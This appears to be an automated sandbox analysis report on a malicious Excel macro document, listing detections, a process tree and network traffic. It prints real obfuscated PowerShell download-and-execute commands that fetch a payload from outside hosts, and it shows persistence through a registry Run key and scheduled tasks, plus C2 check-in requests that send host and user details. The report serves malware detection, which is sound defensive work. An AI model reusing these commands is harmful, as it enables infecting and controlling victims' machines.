Loading ...

Play interactive tourEdit tour

Analysis Report 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Overview

General Information

Sample Name:1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
Analysis ID:335896
MD5:4468e0175c68f3751fc2027f1e42ca0c
SHA1:c19aff367853c61d750b2da47623b69d8c1b42bb
SHA256:4054344f07e1877b2cbb1a13c9bee260f0ae1f41c713374ccb9b130e3bae19a6
Tags:SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
.NET source code contains potential unpacker
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Found C&C like URL pattern
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2560 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2312 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2556 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2800 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1976 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2880 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 2972 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 2344 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 960 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 1688 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 3012 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 620 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 2264 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • ps.exe (PID: 2364 cmdline: 'C:\Users\user\AppData\Local\Temp\ps.exe' MD5: 128409D5CB9701CD12600BAF7A623794)
                • schtasks.exe (PID: 2940 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                • ps.exe (PID: 2932 cmdline: C:\Users\user\AppData\Local\Temp\ps.exe MD5: 128409D5CB9701CD12600BAF7A623794)
                  • cmd.exe (PID: 1840 cmdline: 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
                    • reg.exe (PID: 3016 cmdline: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe MD5: D69A9ABBB0D795F21995C2F48C1EB560)
                  • svchost.exe (PID: 2528 cmdline: 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 128409D5CB9701CD12600BAF7A623794)
                    • schtasks.exe (PID: 3052 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                    • svchost.exe (PID: 2184 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 128409D5CB9701CD12600BAF7A623794)
                    • svchost.exe (PID: 2464 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 128409D5CB9701CD12600BAF7A623794)
    • cmd.exe (PID: 2804 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2448 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • svchost.exe (PID: 2856 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • svchost.exe (PID: 2800 cmdline: 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 128409D5CB9701CD12600BAF7A623794)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x279c2:$s1: Excel
  • 0x2416c:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x124eb:$r1: p^owersh^el^l
  • 0x12719:$r1: p^owersh^el^l
  • 0x1298b:$r1: p^owersh^el^l
  • 0x12b6d:$r1: p^owersh^el^l
  • 0x124eb:$r2: p^owersh^el^l
  • 0x12719:$r2: p^owersh^el^l
  • 0x1298b:$r2: p^owersh^el^l
  • 0x12b6d:$r2: p^owersh^el^l
dump.pcapJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\pd.batSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0xd4:$r1: p^owersh^el^l
    • 0x302:$r1: p^owersh^el^l
    • 0x52e:$r1: p^owersh^el^l
    • 0x710:$r1: p^owersh^el^l
    • 0xd4:$r2: p^owersh^el^l
    • 0x302:$r2: p^owersh^el^l
    • 0x52e:$r2: p^owersh^el^l
    • 0x710:$r2: p^owersh^el^l
    C:\Users\user\Documents\pd.batJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000020.00000002.2179906707.0000000002601000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000018.00000002.2157884372.0000000002671000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000027.00000002.2192856956.0000000002661000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
            • 0x1aae2:$r1: p^owersh^el^l
            • 0x1ad10:$r1: p^owersh^el^l
            • 0x1af3c:$r1: p^owersh^el^l
            • 0x1b11e:$r1: p^owersh^el^l
            • 0x1d18c:$r1: p^owersh^el^l
            • 0x1d3ba:$r1: p^owersh^el^l
            • 0x1d5e6:$r1: p^owersh^el^l
            • 0x1d7c8:$r1: p^owersh^el^l
            • 0x1da64:$r1: p^owersh^el^l
            • 0x1dc92:$r1: p^owersh^el^l
            • 0x1debe:$r1: p^owersh^el^l
            • 0x1e0a0:$r1: p^owersh^el^l
            • 0x1aae2:$r2: p^owersh^el^l
            • 0x1ad10:$r2: p^owersh^el^l
            • 0x1af3c:$r2: p^owersh^el^l
            • 0x1b11e:$r2: p^owersh^el^l
            • 0x1d18c:$r2: p^owersh^el^l
            • 0x1d3ba:$r2: p^owersh^el^l
            • 0x1d5e6:$r2: p^owersh^el^l
            • 0x1d7c8:$r2: p^owersh^el^l
            • 0x1da64:$r2: p^owersh^el^l

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Scheduled temp file as task from temp locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\ps.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2364, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp', ProcessId: 2940
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 944, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2560
            Sigma detected: Suspicious Svchost ProcessShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ps.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2932, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , ProcessId: 2528
            Sigma detected: System File Execution Location AnomalyShow sources
            Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ps.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2932, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , ProcessId: 2528
            Sigma detected: Hiding Files with Attrib.exeShow sources
            Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2880, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 2972
            Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
            Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ps.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ps.exe, ParentProcessId: 2932, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\svchost.exe' , ProcessId: 2528

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ps.exeJoe Sandbox ML: detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer

            Software Vulnerabilities:

            barindex
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then sub esp, 2Ch
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push esi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebx
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov dword ptr [ecx], 00491728h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov edx, dword ptr [ecx+08h]
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push edi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebx
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then sub esp, 1Ch
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov dword ptr [ecx], 00491AB0h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push edi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebx
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then sub esp, 1Ch
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebx
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov dword ptr [ecx], 00492088h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov eax, dword ptr [ecx]
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov dword ptr [ecx], 00492108h
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov eax, dword ptr [0048E55Ch]
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebx
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push edi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push esi
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then push ebp
            Source: C:\Users\user\AppData\Local\Temp\ps.exeCode function: 4x nop then mov dword ptr [ecx], 004921A0h
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
            Source: global trafficDNS query: name: cutt.ly
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49171 -> 172.67.167.122:80
            Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49171 -> 172.67.167.122:80
            Source: TrafficSnort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49171 -> 172.67.167.122:80
            Source: TrafficSnort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49172 -> 172.67.167.122:80
            Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49172 -> 172.67.167.122:80
            Source: TrafficSnort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49172 -> 172.67.167.122:80
            Found C&C like URL patternShow sources
            Source: global trafficHTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
            Source: global trafficHTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
            Source: global trafficHTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 172.67.8.238 172.67.8.238
            Source: Joe Sandbox ViewIP Address: 37.46.150.139 37.46.150.139
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
            Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
            Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
            Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
            Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
            Source: global trafficHTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
            Source: global trafficHTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
